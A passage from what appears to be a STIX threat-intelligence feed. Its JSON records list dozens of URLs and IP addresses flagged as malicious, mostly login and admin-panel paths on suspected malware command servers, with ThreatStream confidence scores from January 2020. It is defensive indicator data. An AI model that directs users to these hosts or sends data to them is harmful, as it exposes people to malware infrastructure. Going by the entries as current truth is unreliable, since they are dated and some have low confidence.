http://109.94.208.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://109.94.208.144/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.705Z"} +{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: http://45.14.50.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.50.207/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} +{"created":"2020-01-26T02:55:15.785Z","description":"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--751f6e49-92d5-4ff4-9245-870a49dce478","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:15.785Z","name":"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.785Z"} +{"created":"2020-01-26T02:55:22.112Z","description":"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:22.112Z","name":"mal_url: http://pecunia110011.at/iteat/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pecunia110011.at/iteat/']","type":"indicator","valid_from":"2020-01-26T02:55:22.112Z"} +{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://188.127.230.249/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.127.230.249/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} +{"created":"2020-01-26T02:55:32.119Z","description":"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:32.119Z","name":"mal_url: http://jor1.berbagsansa.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.berbagsansa.com/login']","type":"indicator","valid_from":"2020-01-26T02:55:32.119Z"} +{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: http://92.63.192.190/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.192.190/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} +{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://190.14.38.202/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.14.38.202/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} +{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://45.132.104.20/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.132.104.20/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} +{"created":"2020-01-26T02:55:33.738Z","description":"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-01-26T02:55:33.738Z","name":"mal_url: http://aboutworld.info/manage/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aboutworld.info/manage/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:33.738Z"} +{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://176.113.115.205/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://176.113.115.205/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} +{"created":"2020-01-26T02:55:33.984Z","description":"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--274a9145-93f7-4146-a879-68fce2fc1188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:33.984Z","name":"mal_url: http://10121.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10121.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:33.984Z"} +{"created":"2020-01-26T02:55:34.637Z","description":"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--ea0abbe1-3033-4549-8ba0-626f43807986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:55:34.637Z","name":"mal_url: http://1926.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1926.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:34.637Z"} +{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 45.139.236.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.139.236.6']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} +{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 92.63.197.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.185']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} +{"created":"2020-01-26T02:55:48.35Z","description":"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime","id":"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:48.35Z","name":"mal_url: http://185-24-53-218.com/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185-24-53-218.com/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:48.35Z"} +{"created":"2020-01-26T02:55:58.711Z","description":"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:58.711Z","name":"mal_url: http://1410.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1410.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:58.711Z"} +{"created":"2020-01-26T02:56:23.739Z","description":"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-26T02:56:23.739Z","name":"mal_url: http://nortonlilly.info/geli/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/geli/login.php']","type":"indicator","valid_from":"2020-01-26T02:56:23.739Z"} +{"created":"2020-01-26T02:56:23.79Z","description":"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--3417c349-153d-4002-92dd-1093893f3180","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-26T02:56:23.79Z","name":"mal_url: http://2208.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2208.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:23.79Z"} +{"created":"2020-01-26T02:56:23.857Z","description":"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-26T02:56:23.857Z","name":"mal_ip: 96.125.163.13","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '96.125.163.13']","type":"indicator","valid_from":"2020-01-26T02:56:23.857Z"} +{"created":"2020-01-26T02:56:29.981Z","description":"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:56:29.981Z","name":"mal_url: http://1012.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1012.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:29.981Z"} +{"created":"2020-01-26T02:56:32.609Z","description":"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime","id":"indicator--5049f714-5462-4f8d-8b13-d95024d477ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-26T02:56:32.609Z","name":"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']","type":"indicator","valid_from":"2020-01-26T02:56:32.609Z"} +{"created":"2020-01-26T02:56:33.504Z","description":"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:56:33.504Z","name":"mal_url: http://51.38.140.2/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.38.140.2/login']","type":"indicator","valid_from":"2020-01-26T02:56:33.504Z"} +{"created":"2020-01-26T02:56:37.688Z","description":"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-26T02:56:37.688Z","name":"mal_url: http://baxarex228.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://baxarex228.xyz/login']","type":"indicator","valid_from":"2020-01-26T02:56:37.688Z"} +{"created":"2020-01-26T02:56:40.17Z","description":"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-01-26T02:56:40.17Z","name":"mal_ip: 185.222.202.91","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.222.202.91']","type":"indicator","valid_from":"2020-01-26T02:56:40.17Z"} +{"created":"2020-01-26T02:56:49.862Z","description":"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime","id":"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:56:49.862Z","name":"mal_ip: 49.51.171.215","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '49.51.171.215']","type":"indicator","valid_from":"2020-01-26T02:56:49.862Z"} +{"created":"2020-01-26T02:56:49.9Z","description":"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-01-26T02:56:49.9Z","name":"mal_ip: 51.89.138.152","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '51.89.138.152']","type":"indicator","valid_from":"2020-01-26T02:56:49.9Z"} +{"created":"2020-01-26T02:56:49.93Z","description":"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-26T02:56:49.93Z","name":"mal_url: http://0409.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0409.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:49.93Z"} +{"created":"2020-01-26T02:57:03.544Z","description":"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--96012440-e95d-46f0-9b70-3f495f4bab32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:57:03.544Z","name":"mal_url: http://jor1.mirtakala.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.mirtakala.com/login']","type":"indicator","valid_from":"2020-01-26T02:57:03.544Z"} +{"created":"2020-01-26T02:57:10.525Z","description":"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:10.525Z","name":"mal_url: http://92.63.197.185/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.185/login']","type":"indicator","valid_from":"2020-01-26T02:57:10.525Z"} +{"created":"2020-01-26T02:57:10.571Z","description":"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-26T02:57:10.571Z","name":"mal_url: http://pnumbrero3.ru/soft/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:57:10.571Z"} +{"created":"2020-01-26T02:57:14.057Z","description":"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--b449e457-5327-40a2-8bda-0167c219490c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:57:14.057Z","name":"mal_url: http://10122.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10122.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:57:14.057Z"} +{"created":"2020-01-26T02:57:26.003Z","description":"TS ID: 55256890125; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:26.003Z","name":"mal_url: http://10123.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10123.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:57:26.003Z"} +{"created":"2020-01-26T02:57:30.579Z","description":"TS ID: 55256890134; iType: mal_url; State: active; Org: Reg.Ru Hosting; Source: CyberCrime","id":"indicator--5898c646-c44b-4365-9d82-77bb1705b6de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:57:30.579Z","name":"mal_url: http://u0929560.cp.regruhosting.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://u0929560.cp.regruhosting.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:57:30.579Z"} +{"created":"2020-01-27T02:54:45.711Z","description":"TS ID: 55259870663; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--f5e450ee-d6c5-4a92-bfb4-4f8025b8c7e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:54:45.711Z","name":"mal_url: http://turames3.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turames3.site/login']","type":"indicator","valid_from":"2020-01-27T02:54:45.711Z"} +{"created":"2020-01-27T02:54:59.928Z","description":"TS ID: 55259870666; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--05b6bf66-2f31-4640-9ecd-9f8a3408d594","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:54:59.928Z","name":"mal_url: http://turames.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turames.site/login']","type":"indicator","valid_from":"2020-01-27T02:54:59.928Z"} +{"created":"2020-01-27T02:55:12.572Z","description":"TS ID: 55259870784; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ff7fb9bd-e816-4a76-ae5c-72c22980c722","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:55:12.572Z","name":"mal_url: http://bumaga5.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bumaga5.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:12.572Z"} +{"created":"2020-01-27T02:55:14.232Z","description":"TS ID: 55259870699; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--b0a1e3ec-d523-4e98-90d6-8ad3daa321d3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:55:14.232Z","name":"mal_url: http://mogute.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mogute.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:14.232Z"} +{"created":"2020-01-27T02:55:14.255Z","description":"TS ID: 55259870694; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--92f0ba43-ec1f-4a37-b933-33ddd3da7e2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:55:14.255Z","name":"mal_url: http://moguto.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://moguto.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:14.255Z"} +{"created":"2020-01-27T02:55:30.174Z","description":"TS ID: 55259870793; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ea0af135-c3c0-4e4e-96d9-bdf1ebb9699e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:55:30.174Z","name":"mal_url: http://bumaga1.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bumaga1.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:30.174Z"} +{"created":"2020-01-27T02:55:30.287Z","description":"TS ID: 55259870765; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--0de60f9b-7383-4c60-9caf-c578c3682487","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-27T02:55:30.287Z","name":"mal_url: http://dufre1in.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufre1in.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:30.287Z"} +{"created":"2020-01-27T02:55:30.319Z","description":"TS ID: 55259870697; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--e8d57d94-82ce-4ce3-a983-d6928172d795","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:55:30.319Z","name":"mal_url: http://moguti.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://moguti.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:30.319Z"} +{"created":"2020-01-27T02:55:30.343Z","description":"TS ID: 55259870654; iType: mal_url; State: active; Org: Lir Ukraine LLC; Source: CyberCrime","id":"indicator--4b567c10-4d32-40e4-87fd-b4654de5bf6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-27T02:55:30.343Z","name":"mal_url: http://stcubegames.netxi.in/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stcubegames.netxi.in/panel/admin.php']","type":"indicator","valid_from":"2020-01-27T02:55:30.343Z"} +{"created":"2020-01-27T02:55:34.56Z","description":"TS ID: 55259870763; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ab82b31f-02c9-4d98-b49f-21ab18a48b1b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-27T02:55:34.56Z","name":"mal_url: http://dufre3.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufre3.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:34.56Z"} +{"created":"2020-01-27T02:55:34.609Z","description":"TS ID: 55259870730; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--47a1bc0c-5444-4c92-a0f8-a51655dd84e5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:55:34.609Z","name":"mal_url: http://merop12.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://merop12.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:34.609Z"} +{"created":"2020-01-27T02:55:36.798Z","description":"TS ID: 55259870681; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--e3ee6b9d-f8cd-42fa-8f51-bb0d54446734","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:55:36.798Z","name":"mal_url: http://ramesvet.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ramesvet.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:36.798Z"} +{"created":"2020-01-27T02:55:38.721Z","description":"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:55:38.721Z","name":"mal_url: http://dufres.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufres.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:38.721Z"} +{"created":"2020-01-27T02:55:45.512Z","description":"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:55:45.512Z","name":"mal_url: http://mogut3.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mogut3.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:45.512Z"} +{"created":"2020-01-27T02:55:48.012Z","description":"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--15806179-df3f-450a-baf5-8e2a29d87faa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-27T02:55:48.012Z","name":"mal_url: http://vidar321.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vidar321.ru/login']","type":"indicator","valid_from":"2020-01-27T02:55:48.012Z"} +{"created":"2020-01-27T02:55:50.673Z","description":"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:55:50.673Z","name":"mal_url: http://91.90.192.161/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://91.90.192.161/login']","type":"indicator","valid_from":"2020-01-27T02:55:50.673Z"} +{"created":"2020-01-27T02:56:02.067Z","description":"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime","id":"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-01-27T02:56:02.067Z","name":"mal_url: http://95.181.178.210/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.181.178.210/login']","type":"indicator","valid_from":"2020-01-27T02:56:02.067Z"} +{"created":"2020-01-27T02:56:03.948Z","description":"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:03.948Z","name":"mal_url: http://turams.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turams.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:03.948Z"} +{"created":"2020-01-27T02:56:05.787Z","description":"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:56:05.787Z","name":"mal_url: 